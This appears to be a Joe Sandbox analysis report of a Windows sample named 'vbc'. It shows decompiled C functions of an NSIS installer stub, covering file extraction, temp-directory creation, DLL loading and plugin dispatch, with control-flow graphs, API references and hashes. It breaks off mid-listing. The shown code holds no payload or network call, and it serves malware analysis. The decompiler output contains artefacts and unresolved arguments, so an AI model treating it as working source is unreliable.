                                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 790 40176f-401794 call 402da6 call 405e83 795 401796-40179c call 40653d 790->795 796 40179e-4017b0 call 40653d call 405e0c lstrcatW 790->796 801 4017b5-4017b6 call 4067c4 795->801 796->801 805 4017bb-4017bf 801->805 806 4017c1-4017cb call 406873 805->806 807 4017f2-4017f5 805->807 814 4017dd-4017ef 806->814 815 4017cd-4017db CompareFileTime 806->815 809 4017f7-4017f8 call 406008 807->809 810 4017fd-401819 call 40602d 807->810 809->810 817 40181b-40181e 810->817 818 40188d-4018b6 call 40559f call 4032b4 810->818 814->807 815->814 819 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 817->819 820 40186f-401879 call 40559f 817->820 832 4018b8-4018bc 818->832 833 4018be-4018ca SetFileTime 818->833 819->805 854 401864-401865 819->854 830 401882-401888 820->830 834 402c33 830->834 832->833 836 4018d0-4018db CloseHandle 832->836 833->836 840 402c35-402c39 834->840 838 4018e1-4018e4 836->838 839 402c2a-402c2d 836->839 842 4018e6-4018f7 call 40657a lstrcatW 838->842 843 4018f9-4018fc call 40657a 838->843 839->834 847 401901-402398 842->847 843->847 852 40239d-4023a2 847->852 853 402398 call 405b9d 847->853 852->840 853->852 854->830 855 401867-401868 854->855 855->820
                                                C-Code - Quality: 75%
                                                			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                				void* __esi;
                                                				void* _t35;
                                                				void* _t43;
                                                				void* _t45;
                                                				FILETIME* _t51;
                                                				FILETIME* _t64;
                                                				void* _t66;
                                                				signed int _t72;
                                                				FILETIME* _t73;
                                                				FILETIME* _t77;
                                                				signed int _t79;
                                                				WCHAR* _t81;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t86;
                                                
                                                				_t77 = __ebx;
                                                				 *(_t86 - 8) = E00402DA6(0x31);
                                                				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                				_t35 = E00405E83( *(_t86 - 8));
                                                				_push( *(_t86 - 8));
                                                				_t81 = L"Call";
                                                				if(_t35 == 0) {
                                                					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                                                				} else {
                                                					E0040653D();
                                                				}
                                                				E004067C4(_t81);
                                                				while(1) {
                                                					__eflags =  *(_t86 + 8) - 3;
                                                					if( *(_t86 + 8) >= 3) {
                                                						_t66 = E00406873(_t81);
                                                						_t79 = 0;
                                                						__eflags = _t66 - _t77;
                                                						if(_t66 != _t77) {
                                                							_t73 = _t66 + 0x14;
                                                							__eflags = _t73;
                                                							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                						__eflags = _t72;
                                                						 *(_t86 + 8) = _t72;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) == _t77) {
                                                						E00406008(_t81);
                                                					}
                                                					__eflags =  *(_t86 + 8) - 1;
                                                					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                					__eflags = _t43 - 0xffffffff;
                                                					 *(_t86 - 0x38) = _t43;
                                                					if(_t43 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) != _t77) {
                                                						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                						__eflags =  *(_t86 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                						__eflags =  *0x434f88;
                                                						goto L32;
                                                					} else {
                                                						E0040653D("C:\Users\Albus\AppData\Local\Temp\nsb1814.tmp", _t83);
                                                						E0040653D(_t83, _t81);
                                                						E0040657A(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp\nsb1814.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                						E0040653D(_t83, "C:\Users\Albus\AppData\Local\Temp\nsb1814.tmp");
                                                						_t64 = E00405B9D("C:\Users\Albus\AppData\Local\Temp\nsb1814.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                						__eflags = _t64;
                                                						if(_t64 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t64 == 1;
                                                							if(_t64 == 1) {
                                                								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                								L32:
                                                								_t51 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t81);
                                                								_push(0xfffffffa);
                                                								E0040559F();
                                                								L29:
                                                								_t51 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t51;
                                                				}
                                                				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                				 *0x434fb4 =  *0x434fb4 + 1;
                                                				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                				 *0x434fb4 =  *0x434fb4 - 1;
                                                				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                				_t84 = _t45;
                                                				if( *(_t86 - 0x24) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				CloseHandle( *(_t86 - 0x38)); // executed
                                                				__eflags = _t84 - _t77;
                                                				if(_t84 >= _t77) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t84 - 0xfffffffe;
                                                					if(_t84 != 0xfffffffe) {
                                                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                					} else {
                                                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                						lstrcatW(_t81,  *(_t86 - 8));
                                                					}
                                                					_push(0x200010);
                                                					_push(_t81);
                                                					E00405B9D();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}


















                                                0x0040176f
                                                0x00401776
                                                0x00401782
                                                0x00401785
                                                0x0040178a
                                                0x0040178d
                                                0x00401794
                                                0x004017b0
                                                0x00401796
                                                0x00401797
                                                0x00401797
                                                0x004017b6
                                                0x004017bb
                                                0x004017bb
                                                0x004017bf
                                                0x004017c2
                                                0x004017c7
                                                0x004017c9
                                                0x004017cb
                                                0x004017d0
                                                0x004017d0
                                                0x004017db
                                                0x004017db
                                                0x004017ec
                                                0x004017ee
                                                0x004017ee
                                                0x004017ef
                                                0x004017ef
                                                0x004017f2
                                                0x004017f5
                                                0x004017f8
                                                0x004017f8
                                                0x004017ff
                                                0x0040180e
                                                0x00401813
                                                0x00401816
                                                0x00401819
                                                0x00000000
                                                0x00000000
                                                0x0040181b
                                                0x0040181e
                                                0x00401874
                                                0x00401879
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c2d
                                                0x00000000
                                                0x00401820
                                                0x00401826
                                                0x0040182d
                                                0x0040183a
                                                0x00401845
                                                0x0040185b
                                                0x0040185b
                                                0x0040185e
                                                0x00000000
                                                0x00401864
                                                0x00401864
                                                0x00401865
                                                0x00401882
                                                0x00402c33
                                                0x00402c33
                                                0x00402c33
                                                0x00401867
                                                0x00401867
                                                0x00401868
                                                0x00401493
                                                0x0040239d
                                                0x0040239d
                                                0x0040239d
                                                0x00401865
                                                0x0040185e
                                                0x00402c35
                                                0x00402c39
                                                0x00402c39
                                                0x00401892
                                                0x00401897
                                                0x004018a5
                                                0x004018aa
                                                0x004018b0
                                                0x004018b4
                                                0x004018b6
                                                0x004018be
                                                0x004018ca
                                                0x004018b8
                                                0x004018b8
                                                0x004018bc
                                                0x00000000
                                                0x00000000
                                                0x004018bc
                                                0x004018d3
                                                0x004018d9
                                                0x004018db
                                                0x00000000
                                                0x004018e1
                                                0x004018e1
                                                0x004018e4
                                                0x004018fc
                                                0x004018e6
                                                0x004018e9
                                                0x004018f2
                                                0x004018f2
                                                0x00401901
                                                0x00401906
                                                0x00402398
                                                0x00000000
                                                0x00402398
                                                0x00000000

                                                APIs
                                                • lstrcatW.KERNEL32 ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsb1814.tmp$C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll$Call
                                                • API String ID: 1941528284-3180859007
                                                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 856 40559f-4055b4 857 4055ba-4055cb 856->857 858 40566b-40566f 856->858 859 4055d6-4055e2 lstrlenW 857->859 860 4055cd-4055d1 call 40657a 857->860 862 4055e4-4055f4 lstrlenW 859->862 863 4055ff-405603 859->863 860->859 862->858 864 4055f6-4055fa lstrcatW 862->864 865 405612-405616 863->865 866 405605-40560c SetWindowTextW 863->866 864->863 867 405618-40565a SendMessageW * 3 865->867 868 40565c-40565e 865->868 866->865 867->868 868->858 869 405660-405663 868->869 869->858
                                                C-Code - Quality: 100%
                                                			E0040559F(signed int _a4, WCHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				WCHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				WCHAR* _t27;
                                                				signed int _t28;
                                                				long _t29;
                                                				signed int _t37;
                                                				signed int _t38;
                                                
                                                				_t27 =  *0x433ee4;
                                                				_v8 = _t27;
                                                				if(_t27 != 0) {
                                                					_t37 =  *0x434fb4;
                                                					_v12 = _t37;
                                                					_t38 = _t37 & 0x00000001;
                                                					if(_t38 == 0) {
                                                						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                					}
                                                					_t27 = lstrlenW(0x42c248);
                                                					_a4 = _t27;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x42c248;
                                                							_v52 = 1;
                                                							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t38;
                                                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                						}
                                                						if(_t38 != 0) {
                                                							_t28 = _a4;
                                                							0x42c248[_t28] = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t27 = lstrlenW(_a8) + _a4;
                                                						if(_t27 < 0x1000) {
                                                							_t27 = lstrcatW(0x42c248, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t27;
                                                			}

















                                                0x004055a5
                                                0x004055af
                                                0x004055b4
                                                0x004055ba
                                                0x004055c5
                                                0x004055c8
                                                0x004055cb
                                                0x004055d1
                                                0x004055d1
                                                0x004055d7
                                                0x004055df
                                                0x004055e2
                                                0x004055ff
                                                0x00405603
                                                0x0040560c
                                                0x0040560c
                                                0x00405616
                                                0x0040561f
                                                0x0040562b
                                                0x00405632
                                                0x00405636
                                                0x00405639
                                                0x0040564c
                                                0x0040565a
                                                0x0040565a
                                                0x0040565e
                                                0x00405660
                                                0x00405663
                                                0x00000000
                                                0x00405663
                                                0x004055e4
                                                0x004055ec
                                                0x004055f4
                                                0x004055fa
                                                0x00000000
                                                0x004055fa
                                                0x004055f4
                                                0x004055e2
                                                0x0040566f

                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                • lstrcatW.KERNEL32 ref: 004055FA
                                                • SetWindowTextW.USER32 ref: 0040560C
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000), ref: 00406779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll
                                                • API String ID: 1495540970-3393624270
                                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 870 40689a-4068ba GetSystemDirectoryW 871 4068bc 870->871 872 4068be-4068c0 870->872 871->872 873 4068d1-4068d3 872->873 874 4068c2-4068cb 872->874 876 4068d4-406907 wsprintfW LoadLibraryExW 873->876 874->873 875 4068cd-4068cf 874->875 875->876
                                                C-Code - Quality: 100%
                                                			E0040689A(intOrPtr _a4) {
                                                				short _v576;
                                                				signed int _t13;
                                                				struct HINSTANCE__* _t17;
                                                				signed int _t19;
                                                				void* _t24;
                                                
                                                				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                				if(_t13 > 0x104) {
                                                					_t13 = 0;
                                                				}
                                                				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                					_t19 = 1;
                                                				} else {
                                                					_t19 = 0;
                                                				}
                                                				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                				return _t17;
                                                			}








                                                0x004068b1
                                                0x004068ba
                                                0x004068bc
                                                0x004068bc
                                                0x004068c0
                                                0x004068d3
                                                0x004068cd
                                                0x004068cd
                                                0x004068cd
                                                0x004068ec
                                                0x00406900
                                                0x00406907

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                • wsprintfW.USER32 ref: 004068EC
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 877 405a6e-405ab9 CreateDirectoryW 878 405abb-405abd 877->878 879 405abf-405acc GetLastError 877->879 880 405ae6-405ae8 878->880 879->880 881 405ace-405ae2 SetFileSecurityW 879->881 881->878 882 405ae4 GetLastError 881->882 882->880
                                                C-Code - Quality: 100%
                                                			E00405A6E(WCHAR* _a4) {
                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                				int _t22;
                                                				long _t23;
                                                
                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                				_v36.Owner = 0x4083f8;
                                                				_v36.Group = 0x4083f8;
                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                				_v36.Revision = 1;
                                                				_v36.Control = 4;
                                                				_v36.Dacl = 0x4083e8;
                                                				_v16.nLength = 0xc;
                                                				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                				if(_t22 != 0) {
                                                					L1:
                                                					return 0;
                                                				}
                                                				_t23 = GetLastError();
                                                				if(_t23 == 0xb7) {
                                                					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                						goto L1;
                                                					}
                                                					return GetLastError();
                                                				}
                                                				return _t23;
                                                			}







                                                0x00405a79
                                                0x00405a7d
                                                0x00405a80
                                                0x00405a86
                                                0x00405a8a
                                                0x00405a8e
                                                0x00405a96
                                                0x00405a9d
                                                0x00405aa3
                                                0x00405aaa
                                                0x00405ab1
                                                0x00405ab9
                                                0x00405abb
                                                0x00000000
                                                0x00405abb
                                                0x00405ac5
                                                0x00405acc
                                                0x00405ae2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ae4
                                                0x00405ae8

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3449924974-4017390910
                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 883 73191817-73191856 call 73191bff 887 7319185c-73191860 883->887 888 73191976-73191978 883->888 889 73191869-73191876 call 73192480 887->889 890 73191862-73191868 call 7319243e 887->890 895 73191878-7319187d 889->895 896 731918a6-731918ad 889->896 890->889 899 73191898-7319189b 895->899 900 7319187f-73191880 895->900 897 731918cd-731918d1 896->897 898 731918af-731918cb call 73192655 call 73191654 call 73191312 GlobalFree 896->898 901 7319191e-73191924 call 73192655 897->901 902 731918d3-7319191c call 73191666 call 73192655 897->902 923 73191925-73191929 898->923 899->896 903 7319189d-7319189e call 73192e23 899->903 905 73191888-73191889 call 73192b98 900->905 906 73191882-73191883 900->906 901->923 902->923 916 731918a3 903->916 919 7319188e 905->919 911 73191890-73191896 call 73192810 906->911 912 73191885-73191886 906->912 922 731918a5 911->922 912->896 912->905 916->922 919->916 922->896 926 7319192b-73191939 call 73192618 923->926 927 73191966-7319196d 923->927 933 7319193b-7319193e 926->933 934 73191951-73191958 926->934 927->888 929 7319196f-73191970 GlobalFree 927->929 929->888 933->934 936 73191940-73191948 933->936 934->927 935 7319195a-73191965 call 731915dd 934->935 935->927 936->934 938 7319194a-7319194b FreeLibrary 936->938 938->934
                                                C-Code - Quality: 88%
                                                			E73191817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void _v36;
                                                				char _v136;
                                                				struct HINSTANCE__* _t37;
                                                				intOrPtr _t42;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t50;
                                                				void* _t54;
                                                				intOrPtr _t57;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t72;
                                                				void* _t76;
                                                
                                                				_t76 = __esi;
                                                				_t68 = __edi;
                                                				_t67 = __edx;
                                                				 *0x7319506c = _a8;
                                                				 *0x73195070 = _a16;
                                                				 *0x73195074 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x73195048, E73191651);
                                                				_push(1); // executed
                                                				_t37 = E73191BFF(); // executed
                                                				_t54 = _t37;
                                                				if(_t54 == 0) {
                                                					L28:
                                                					return _t37;
                                                				} else {
                                                					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                						E7319243E(_t54);
                                                					}
                                                					_push(_t54);
                                                					E73192480(_t67);
                                                					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                					if(_t57 == 0xffffffff) {
                                                						L14:
                                                						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                								_push(_t54);
                                                								_t37 = E73192655();
                                                							} else {
                                                								_push(_t76);
                                                								_push(_t68);
                                                								_t61 = 8;
                                                								_t13 = _t54 + 0x1018; // 0x1018
                                                								memcpy( &_v36, _t13, _t61 << 2);
                                                								_t42 = E73191666(_t54,  &_v136);
                                                								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                								_t18 = _t54 + 0x1018; // 0x1018
                                                								_t72 = _t18;
                                                								_push(_t54);
                                                								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                								 *_t72 = 4;
                                                								E73192655();
                                                								_t63 = 8;
                                                								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                							}
                                                						} else {
                                                							_push(_t54);
                                                							E73192655();
                                                							_t37 = GlobalFree(E73191312(E73191654(_t54)));
                                                						}
                                                						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                							_t37 = E73192618(_t54);
                                                							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                								_t37 =  *(_t54 + 0x1008);
                                                								if(_t37 != 0) {
                                                									_t37 = FreeLibrary(_t37);
                                                								}
                                                							}
                                                							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                								_t37 = E731915DD( *0x73195068);
                                                							}
                                                						}
                                                						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                							goto L28;
                                                						} else {
                                                							return GlobalFree(_t54);
                                                						}
                                                					}
                                                					_t48 =  *_t54;
                                                					if(_t48 == 0) {
                                                						if(_t57 != 1) {
                                                							goto L14;
                                                						}
                                                						E73192E23(_t54);
                                                						L12:
                                                						_t54 = _t48;
                                                						L13:
                                                						goto L14;
                                                					}
                                                					_t49 = _t48 - 1;
                                                					if(_t49 == 0) {
                                                						L8:
                                                						_t48 = E73192B98(_t57, _t54); // executed
                                                						goto L12;
                                                					}
                                                					_t50 = _t49 - 1;
                                                					if(_t50 == 0) {
                                                						E73192810(_t54);
                                                						goto L13;
                                                					}
                                                					if(_t50 != 1) {
                                                						goto L14;
                                                					}
                                                					goto L8;
                                                				}
                                                			}


















                                                0x73191817
                                                0x73191817
                                                0x73191817
